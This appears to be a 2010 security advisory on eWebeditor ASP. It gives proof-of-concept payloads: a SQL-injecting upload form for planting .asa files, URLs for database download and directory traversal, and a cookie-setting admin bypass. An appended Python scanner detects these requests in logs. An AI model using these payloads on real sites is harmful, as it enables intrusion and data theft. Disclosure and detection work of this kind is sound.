SECURITYVULNS:DOC:23168
Feb 04, 2010

eWebeditor ASP Version Multiple Vulnerabilities


#################################################################

Securitylab.ir

#################################################################

Application Info:

Name: eWebeditor

Version: ASP

#################################################################
Vulnerability:

=======================
Arbitrary File Upload

<form action="http://site.com/manage/ewebeditor/upload.asp?action=save&amp;type=IMAGE&amp;style=luoye 'union select S_ID, S_Name, S_Dir, S_CSS, [S_UploadDir]% 2b' /
… / db ', S_Width, S_Height, S_Memo, S_IsSys, S_FileExt, S_FlashExt, [S_ImageExt]% 2b' | asa ', S_MediaExt, S_FileSize, S_FlashSize, S_ImageSize, S_MediaSize,
S_StateFlag, S_DetectFromWord, S_InitMode, S_BaseUrl from ewebeditor_style where s_name =' standard 'and'a' = 'a" method=post name=myform enctype="multipart/form-data">
<p align="center">
<input type=file name=uploadfile size=100><br> <br>
<input type=submit value=Upload>&nbsp; </p>
</form>

=======================
Arbitrary File Upload 2

http://site.com/admin/ewebeditor/ewebeditor.htm?id=body&style=popup

=======================
Database Disclosure

http://site.com/ewebeditor/db/ewebeditor.mdb

=======================
Administrator bypass

http://site.com/eWebEditor/admin/login.asp

Enter this code in place of the URL:
javascript:alert(document.cookie="adminpass="+escape("admin"));

=======================
Directory Traversal

http://site.com/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=./

=======================
Directory Traversal 2

http://site.com/ewebeditor/asp/browse.asp?style=standard650&dir=./

#################################################################

Discovered by: Pouya Daneshmand

Website: http://securitylab.ir

Contacts: info[at]securitylab.ir & [email protected]

###################################################################
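
A defender-side check for the request shapes listed in this advisory, as an added example that is not part of the original advisory or of eWebEditor: it classifies logged request URIs and Cookie headers. The function names, labels and sample records are constructed for illustration; the adminpass rule is an assumption and may also match legitimate administrator sessions, so treat it as a prompt for review.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

DOT_SEGMENT = re.compile(r"(^|[\\/])\.{1,2}([\\/]|$)")  # "./", "../", "..\"
SQL_META = re.compile(r"'|\bunion\b|\bselect\b")
ADMINPASS = re.compile(r"(^|;\s*)adminpass\s*=", re.I)

def classify(uri, cookie=""):
    """Return sorted labels of the advisory's request shapes that match."""
    parts = urlsplit(uri)
    path = unquote(parts.path).lower()
    if "ewebeditor" not in path:
        return []
    # parse_qs percent-decodes values; lower-case keys and values for matching
    query = {k.lower(): " ".join(v).lower()
             for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    hits = set()
    if path.endswith(".mdb"):                      # Database Disclosure
        hits.add("database-download")
    if path.endswith("/upload.asp") and SQL_META.search(query.get("style", "")):
        hits.add("sql-in-style-parameter")         # Arbitrary File Upload
    if (path.endswith(("/upload.asp", "/browse.asp"))
            and DOT_SEGMENT.search(query.get("dir", ""))):
        hits.add("dot-segment-in-dir")             # Directory Traversal 1 and 2
    if "/admin/" in path and ADMINPASS.search(cookie):
        hits.add("adminpass-cookie-on-admin-page") # Administrator bypass
    return sorted(hits)

def scan(records):
    """records: iterable of (uri, cookie_header); return only flagged ones."""
    return [(uri, labels) for uri, cookie in records
            if (labels := classify(uri, cookie))]

# Constructed sample records (cs-uri with query, Cookie header), not real logs.
SAMPLE = [
    ("/ewebeditor/db/ewebeditor.mdb", ""),
    ("/manage/ewebeditor/upload.asp?action=save&type=IMAGE&style=x'%20union%20select%201", ""),
    ("/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=./", ""),
    ("/ewebeditor/asp/browse.asp?style=standard650&dir=images/2010", ""),
    ("/eWebEditor/admin/login.asp", "ASPSESSIONID=abc; adminpass=admin"),
    ("/index.asp?dir=./", ""),
]

if __name__ == "__main__":
    for uri, labels in scan(SAMPLE):
        print(", ".join(labels), "<-", uri)
```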